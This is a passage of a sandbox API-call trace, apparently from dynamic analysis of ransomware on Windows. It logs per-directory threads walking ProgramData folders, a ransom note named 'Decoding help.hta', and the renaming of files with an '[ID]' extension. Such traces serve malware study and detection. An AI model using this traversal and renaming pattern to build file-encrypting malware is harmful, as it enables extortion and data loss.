cAlternateFileName="ACTIVI~1")) returned 1 [0050.559] lstrcmpW (lpString1=".", lpString2="ActivityLog") returned -1 [0050.559] lstrcmpW (lpString1="..", lpString2="ActivityLog") returned -1 [0050.559] lstrcmpiW (lpString1="windows", lpString2="ActivityLog") returned 1 [0050.559] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.559] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned 49 [0050.560] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\", lpString2="ActivityLog" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0050.560] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*" [0050.560] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0050.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1134c370, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x73c [0050.724] CloseHandle (hObject=0x73c) returned 1 [0050.724] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0050.724] lstrcmpW (lpString1=".", lpString2="Common Coverpages") returned -1 [0050.724] lstrcmpW (lpString1="..", lpString2="Common Coverpages") returned -1 [0050.724] lstrcmpiW (lpString1="windows", lpString2="Common Coverpages") returned 1 [0050.727] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.727] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned 49 [0050.727] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\", lpString2="Common Coverpages" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0050.727] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*" [0050.727] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0050.728] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x252ffff0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x73c [0050.761] CloseHandle (hObject=0x73c) returned 1 [0050.761] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Inbox", cAlternateFileName="")) returned 1 [0050.761] lstrcmpW (lpString1=".", lpString2="Inbox") returned -1 [0050.761] lstrcmpW (lpString1="..", lpString2="Inbox") returned -1 [0050.761] lstrcmpiW (lpString1="windows", lpString2="Inbox") returned 1 [0050.764] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.764] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned 49 [0050.764] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\", lpString2="Inbox" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox" [0050.764] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*" [0050.764] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0050.764] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x253781f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x73c [0050.769] CloseHandle (hObject=0x73c) returned 1 [0050.769] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Queue", cAlternateFileName="")) returned 1 [0050.769] lstrcmpW (lpString1=".", lpString2="Queue") returned -1 [0050.769] lstrcmpW (lpString1="..", lpString2="Queue") returned -1 [0050.769] lstrcmpiW (lpString1="windows", lpString2="Queue") returned 1 [0050.769] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.769] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned 49 [0050.769] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\", lpString2="Queue" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue" [0050.769] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*" [0050.769] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0050.769] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24590ff8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x73c [0050.770] CloseHandle (hObject=0x73c) returned 1 [0050.770] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0050.770] lstrcmpW (lpString1=".", lpString2="SentItems") returned -1 [0050.770] lstrcmpW (lpString1="..", lpString2="SentItems") returned -1 [0050.770] lstrcmpiW (lpString1="windows", lpString2="SentItems") returned 1 [0050.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.770] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned 49 [0050.770] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\", lpString2="SentItems" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems" [0050.770] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*" [0050.770] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0050.771] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cf0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x73c [0050.771] CloseHandle (hObject=0x73c) returned 1 [0050.771] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0050.771] lstrcmpW (lpString1=".", lpString2="VirtualInbox") returned -1 [0050.771] lstrcmpW (lpString1="..", lpString2="VirtualInbox") returned -1 [0050.771] lstrcmpiW (lpString1="windows", lpString2="VirtualInbox") returned 1 [0050.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.771] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned 49 [0050.771] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\", lpString2="VirtualInbox" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0050.772] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*" [0050.772] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0050.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93a02b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x73c [0050.772] CloseHandle (hObject=0x73c) returned 1 [0050.772] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 0 [0050.772] FindClose (in: hFindFile=0x5d8b50 | out: hFindFile=0x5d8b50) returned 1 Thread: id = 568 os_tid = 0xd24 [0048.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*", lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x273d4370, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2e30 [0051.466] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.466] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x273d4370, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x273d4370, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.466] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0051.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.466] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2708e530, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x2708e530, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2708e530, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0051.466] lstrcpyW (in: lpString1=0x25440540, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*" [0051.466] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*") returned 50 [0051.466] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta" [0051.466] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\decoding help.hta")) returned 0x2020 [0054.014] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea12c467, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xea12c467, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xea1525c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x0, dwReserved1=0x0, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 1 [0054.014] lstrcpyW (in: lpString1=0x25440540, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*" [0054.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*") returned 50 [0054.014] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta" [0054.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\decoding help.hta")) returned 0x2020 [0054.014] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WelcomeScan.jpg") returned -1 [0054.015] lstrlenW (lpString="WelcomeScan.jpg") returned 15 [0054.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*" [0054.015] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*") returned 50 [0054.015] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\", lpString2="WelcomeScan.jpg" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" [0054.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" [0054.015] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0054.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.015] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea12c467, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xea12c467, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xea1525c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x0, dwReserved1=0x0, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 0 [0054.015] FindClose (in: hFindFile=0x5e2e30 | out: hFindFile=0x5e2e30) returned 1 Thread: id = 569 os_tid = 0xd28 [0048.532] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*", lpFindFileData=0x171dfd30 | out: lpFindFileData=0x171dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bb0 [0048.532] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.532] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x171dfd30 | out: lpFindFileData=0x171dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.532] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.533] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.533] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x171dfd30 | out: lpFindFileData=0x171dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0048.533] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_x86") returned -1 [0048.533] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_x86") returned -1 [0048.533] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_x86") returned 1 [0048.533] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*" [0048.533] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*") returned 95 [0048.533] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0048.533] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0048.533] GlobalMemoryStatus (in: lpBuffer=0x171dfd10 | out: lpBuffer=0x171dfd10) [0048.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10988880, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a0 [0048.559] CloseHandle (hObject=0x5a0) returned 1 [0048.559] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x171dfd30 | out: lpFindFileData=0x171dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0048.559] FindClose (in: hFindFile=0x5e2bb0 | out: hFindFile=0x5e2bb0) returned 1 Thread: id = 570 os_tid = 0xd2c [0048.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*", lpFindFileData=0x1751fd30 | out: lpFindFileData=0x1751fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812936d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812936d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5330 [0048.558] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.558] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x1751fd30 | out: lpFindFileData=0x1751fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812936d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812936d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.559] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.559] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.559] 